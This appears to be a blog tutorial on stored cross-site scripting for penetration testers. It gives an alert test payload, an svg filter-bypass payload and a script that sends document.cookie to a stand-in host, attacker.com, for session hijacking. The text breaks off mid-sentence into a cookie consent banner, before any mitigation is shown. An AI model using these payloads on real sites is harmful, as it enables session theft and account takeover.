Understanding Stored XSS Vulnerabilities: A Penetration Tester’s Guide

Listen to this Post

🐢▶️ Listen🚀

Introduction

Stored Cross-Site Scripting (XSS) is a critical web security flaw where malicious scripts are permanently embedded in a target application, often in databases or comment fields. Unlike reflected XSS, stored XSS attacks persist and execute whenever a user accesses the infected page, making them particularly dangerous. This article explores how to identify, exploit, and mitigate stored XSS vulnerabilities, with practical commands and techniques for penetration testers and bug hunters.

Learning Objectives

• Understand how stored XSS differs from other XSS types.
• Learn how to identify and exploit stored XSS vulnerabilities.
• Implement best practices to prevent stored XSS attacks.

You Should Know

1. Identifying Stored XSS Vulnerabilities

Command (Burp Suite Interception):

POST /comment HTTP/1.1 
Host: vulnerable-site.com 
Content-Type: application/x-www-form-urlencoded

comment=<script>alert('XSS')</script> 

Step-by-Step Guide:

1. Intercept a POST request (e.g., a comment submission) using Burp Suite.
2. Inject a basic XSS payload (<script>alert('XSS')</script>) into input fields.
3. If the script executes when the page reloads, the site is vulnerable.

2. Exploiting Stored XSS for Session Hijacking

JavaScript Payload:

<script> 
fetch('https://attacker.com/steal?cookie=' + document.cookie); 
</script>

Step-by-Step Guide:

1. Inject the payload into a vulnerable field (e.g., user profile, forum post).
2. When a victim views the infected page, their session cookie is sent to the attacker’s server.
3. Use the stolen cookie to hijack the session.

3. Bypassing XSS Filters

Obfuscated Payload:

<

svg/onload=alert('XSS')> 

Step-by-Step Guide:

1. Many filters block `
   Manage Consent

   To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent may adversely affect certain features and functions.

   We do not sell your personal data. If you wish to exercise your rights under applicable privacy laws, please visit our Do Not Sell My Personal Information page.

   Functional Functional Always active

   The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.

   Preferences Preferences

   The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.

   Statistics Statistics

   The technical storage or access that is used exclusively for statistical purposes. The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.

   Marketing Marketing

   The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.

   • Manage options
   • Manage services
   • Manage {vendor_count} vendors
   • Read more about these purposes

   Accept Deny View preferences Save preferences View preferences

   • {title}
   • {title}
   • {title}
   Manage consent